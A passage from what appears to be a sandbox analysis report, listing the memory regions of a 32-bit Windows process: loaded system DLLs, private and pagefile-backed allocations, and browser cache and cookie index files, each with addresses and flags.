0x73690000 end_va = 0x736cefff monitored = 0 entry_point = 0x736be088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1017 start_va = 0x73630000 end_va = 0x7368bfff monitored = 0 entry_point = 0x7366f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1018 start_va = 0x73620000 end_va = 0x73627fff monitored = 0 entry_point = 0x736220f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1019 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1020 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1021 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1022 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076b00000" filename = "" Region: id = 1023 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 0 entry_point = 0x76c3a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1024 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076c20000" filename = "" Region: id = 1025 start_va = 0x540000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1026 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1027 start_va = 0x753c0000 end_va = 0x75406fff monitored = 0 entry_point = 0x753c74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1028 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1029 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1030 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1031 start_va = 0x1a0000 end_va = 0x206fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1032 start_va = 0x250000 end_va = 0x2cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 1033 start_va = 0x76970000 end_va = 0x76a5ffff monitored = 0 entry_point = 0x76980569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1034 start_va = 0x74a50000 end_va = 0x74aaffff monitored = 0 entry_point = 0x74a6a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1035 start_va = 0x75410000 end_va = 0x754bbfff monitored = 0 entry_point = 0x7541a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1036 start_va = 0x74a40000 end_va = 0x74a4bfff monitored = 0 entry_point = 0x74a410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1037 start_va = 0x759a0000 end_va = 0x759b8fff monitored = 0 entry_point = 0x759a4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1038 start_va = 0x74a10000 end_va = 0x74a21fff monitored = 0 entry_point = 0x74a11200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 1039 start_va = 0x755b0000 end_va = 0x756a4fff monitored = 0 entry_point = 0x755b1865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 1040 start_va = 0x751c0000 end_va = 0x75216fff monitored = 0 entry_point = 0x751d9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1041 start_va = 0x75220000 end_va = 0x752affff monitored = 0 entry_point = 0x75236343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1042 start_va = 0x76860000 end_va = 0x7695ffff monitored = 0 entry_point = 0x7687b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1043 start_va = 0x76a60000 end_va = 0x76afffff monitored = 0 entry_point = 0x76a749e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1044 start_va = 0x759c0000 end_va = 0x759c9fff monitored = 0 entry_point = 0x759c36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1045 start_va = 0x74d40000 end_va = 0x74ddcfff monitored = 0 entry_point = 0x74d73fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1046 start_va = 0x74de0000 end_va = 0x74f15fff monitored = 0 entry_point = 0x74de1b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 1047 start_va = 0x75740000 end_va = 0x7589bfff monitored = 0 entry_point = 0x7578ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1048 start_va = 0x75130000 end_va = 0x751befff monitored = 0 entry_point = 0x75133fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1049 start_va = 0x74ab0000 end_va = 0x74bd0fff monitored = 0 entry_point = 0x74ab158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1050 start_va = 0x76ed0000 end_va = 0x76edbfff monitored = 0 entry_point = 0x76ed238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1051 start_va = 0x74f30000 end_va = 0x7512afff monitored = 0 entry_point = 0x74f322d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 1052 start_va = 0x749d0000 end_va = 0x74a01fff monitored = 0 entry_point = 0x749d37f1 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 1053 start_va = 0x75be0000 end_va = 0x76829fff monitored = 0 entry_point = 0x75c61601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1054 start_va = 0x74830000 end_va = 0x7484bfff monitored = 0 entry_point = 0x7483a431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1055 start_va = 0x76960000 end_va = 0x76965fff monitored = 0 entry_point = 0x76961782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1056 start_va = 0x74820000 end_va = 0x74826fff monitored = 0 entry_point = 0x7482128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1057 start_va = 0x75960000 end_va = 0x75994fff monitored = 0 entry_point = 0x7596145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1058 start_va = 0x74850000 end_va = 0x74893fff monitored = 0 entry_point = 0x748663f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1059 start_va = 0x2d0000 end_va = 0x32ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 1060 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1061 start_va = 0x6f0000 end_va = 0x877fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 1062 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1063 start_va = 0x75550000 end_va = 0x755affff monitored = 0 entry_point = 0x7556158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1064 start_va = 0x74c40000 end_va = 0x74d0bfff monitored = 0 entry_point = 0x74c4168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1065 start_va = 0x880000 end_va = 0xa00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 1066 start_va = 0xa10000 end_va = 0x1e0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 1067 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1068 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1069 start_va = 0x330000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 1070 start_va = 0x210000 end_va = 0x211fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 1071 start_va = 0x73a90000 end_va = 0x73c2dfff monitored = 0 entry_point = 0x73abe6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1072 start_va = 0x220000 end_va = 0x220fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1073 start_va = 0x230000 end_va = 0x231fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 1074 start_va = 0x1e10000 end_va = 0x20defff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1075 start_va = 0x220000 end_va = 0x220fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 1076 start_va = 0x748d0000 end_va = 0x748dafff monitored = 0 entry_point = 0x748d1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1077 start_va = 0x240000 end_va = 0x24ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 1078 start_va = 0x2d0000 end_va = 0x2d7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 1079 start_va = 0x320000 end_va = 0x32ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 1080 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 1081 start_va = 0x74f20000 end_va = 0x74f22fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll") Region: id = 1082 start_va = 0x330000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 1083 start_va = 0x380000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 1084 start_va = 0x20e0000 end_va = 0x21dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020e0000" filename = "" Region: id = 1085 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1086 start_va = 0x73930000 end_va = 0x73981fff monitored = 0 entry_point = 0x739314be region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 1087 start_va = 0x739d0000 end_va = 0x739e4fff monitored = 0 entry_point = 0x739d12de region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 1088 start_va = 0x73920000 end_va = 0x7392cfff monitored = 0 entry_point = 0x73921326 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 1089 start_va = 0x2f0000 end_va = 0x2f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1090 start_va = 0x2f0000 end_va = 0x2f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1091 start_va = 0x3c0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 1092 start_va = 0x21e0000 end_va = 0x22dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021e0000" filename = "" Region: id = 1093 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 1094 start_va = 0x540000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1095 start_va = 0x5f0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 1096 start_va = 0x22e0000 end_va = 0x23dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 1097 start_va = 0x73910000 end_va = 0x73915fff monitored = 0 entry_point = 0x7391125a region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\SysWOW64\\SensApi.dll" (normalized: "c:\\windows\\syswow64\\sensapi.dll") Region: id = 1098 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 1099 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1100 start_va = 0x23e0000 end_va = 0x24dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 1101 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 1102 start_va = 0x24e0000 end_va = 0x251ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Region: id = 1103 start_va = 0x2520000 end_va = 0x261ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002520000" filename = "" Region: id = 1104 start_va = 0x749b0000 end_va = 0x749c6fff monitored = 0 entry_point = 0x749b1c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1105 start_va = 0x7efa7000 end_va = 0x7efa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 1106 start_va = 0x76830000 end_va = 0x7685efff monitored = 0 entry_point = 0x76832a35 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 1107 start_va = 0x74930000 end_va = 0x7496efff monitored = 0 entry_point = 0x74932351 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 1108 start_va = 0x73900000 end_va = 0x7390ffff monitored = 0 entry_point = 0x739038c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll") Region: id = 1109 start_va = 0x2620000 end_va = 0x267ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 1110 start_va = 0x2680000 end_va = 0x282ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 1111 start_va = 0x2620000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 1112 start_va = 0x2670000 end_va = 0x267ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 1113 start_va = 0x747b0000 end_va = 0x747b5fff monitored = 0 entry_point = 0x747b14b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 1114 start_va = 0x300000 end_va = 0x300fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 1115 start_va = 0x2680000 end_va = 0x277ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 1116 start_va = 0x2820000 end_va = 0x282ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002820000" filename = "" Region: id = 1117 start_va = 0x748a0000 end_va = 0x748c0fff monitored = 0 entry_point = 0x748a145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 1118 start_va = 0x75b90000 end_va = 0x75bd4fff monitored = 0 entry_point = 0x75b911e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 1119 start_va = 0x733a0000 end_va = 0x733a8fff monitored = 0 entry_point = 0x733a1220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1120 start_va = 0x310000 end_va = 0x317fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\urlmon.dll.mui") Region: id = 1121 start_va = 0x2620000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat") Region: id = 1122 start_va = 0x747e0000 end_va = 0x7481bfff monitored = 0 entry_point = 0x747e145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1123 start_va = 0x2830000 end_va = 0x29effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002830000" filename = "" Region: id = 1124 start_va = 0x747d0000 end_va = 0x747d4fff monitored = 0 entry_point = 0x747d15df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 1125 start_va = 0x747c0000 end_va = 0x747c5fff monitored = 0 entry_point = 0x747c1673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 1126 start_va = 0x73990000 end_va = 0x739c7fff monitored = 0 entry_point = 0x7399990e region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 1127 start_va = 0x2830000 end_va = 0x28dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002830000" filename = "" Region: id = 1128 start_va = 0x29b0000 end_va = 0x29effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Region: id = 1130 start_va = 0x2780000 end_va = 0x27bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002780000" filename = "" Region: id = 1131 start_va = 0x29f0000 end_va = 0x2aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 1132 start_va = 0x738a0000 end_va = 0x738b6fff monitored = 0 entry_point = 0x738a3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1133 start_va = 0x7efa4000 end_va = 0x7efa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 1134 start_va = 0x370000 end_va = 0x370fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1135 start_va = 0x749a0000 end_va = 0x749a7fff monitored = 0 entry_point = 0x749a34d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\SysWOW64\\credssp.dll" (normalized: "c:\\windows\\syswow64\\credssp.dll") Region: id = 1136 start_va = 0x370000 end_va = 0x371fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1137 start_va = 0x74990000 end_va = 0x74997fff monitored = 0 entry_point = 0x749910e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 1138 start_va = 0x71e60000 end_va = 0x71e97fff monitored = 0 entry_point = 0x71e61489 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 1139 start_va = 0x74970000 end_va = 0x74986fff monitored = 0 entry_point = 0x749735fa region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1140 start_va = 0x71ea0000 end_va = 0x71edcfff monitored = 0 entry_point = 0x71ea10f5 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1141 start_va = 0x738a0000 end_va = 0x738b6fff monitored = 0 entry_point = 0x738a3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1142 start_va = 0x27c0000 end_va = 0x27fbfff monitored = 0 entry_point = 0x27c128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1143 start_va = 0x27c0000 end_va = 0x27fbfff monitored = 0 entry_point = 0x27c128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1144 start_va = 0x27c0000 end_va = 0x27fbfff monitored = 0 entry_point = 0x27c128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1145 start_va = 0x27c0000 end_va = 0x27fbfff monitored = 0 entry_point = 0x27c128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1146 start_va = 0x27c0000 end_va = 0x27fbfff monitored = 0 entry_point = 0x27c128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1147 start_va = 0x73860000 end_va = 0x7389afff monitored = 0 entry_point = 0x7386128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1148 start_va = 0x2af0000 end_va = 0x2beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002af0000" filename = "" Region: id = 1149 start_va = 0x71e20000 end_va = 0x71e35fff monitored = 0 entry_point = 0x71e22061 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\SysWOW64\\gpapi.dll" (normalized: "c:\\windows\\syswow64\\gpapi.dll") Region: id = 1150 start_va = 0x370000 end_va = 0x379fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\crypt32.dll.mui") Region: id = 1151 start_va = 0x75950000 end_va = 0x75954fff monitored = 0 entry_point = 0x75951438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 1152 start_va = 0x2bf0000 end_va = 0x2deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bf0000" filename = "" Region: id = 1153 start_va = 0x73a10000 end_va = 0x73a8ffff monitored = 0 entry_point = 0x73a237c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1154 start_va = 0x2df0000 end_va = 0x2f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002df0000" filename = "" Region: id = 1155 start_va = 0x2df0000 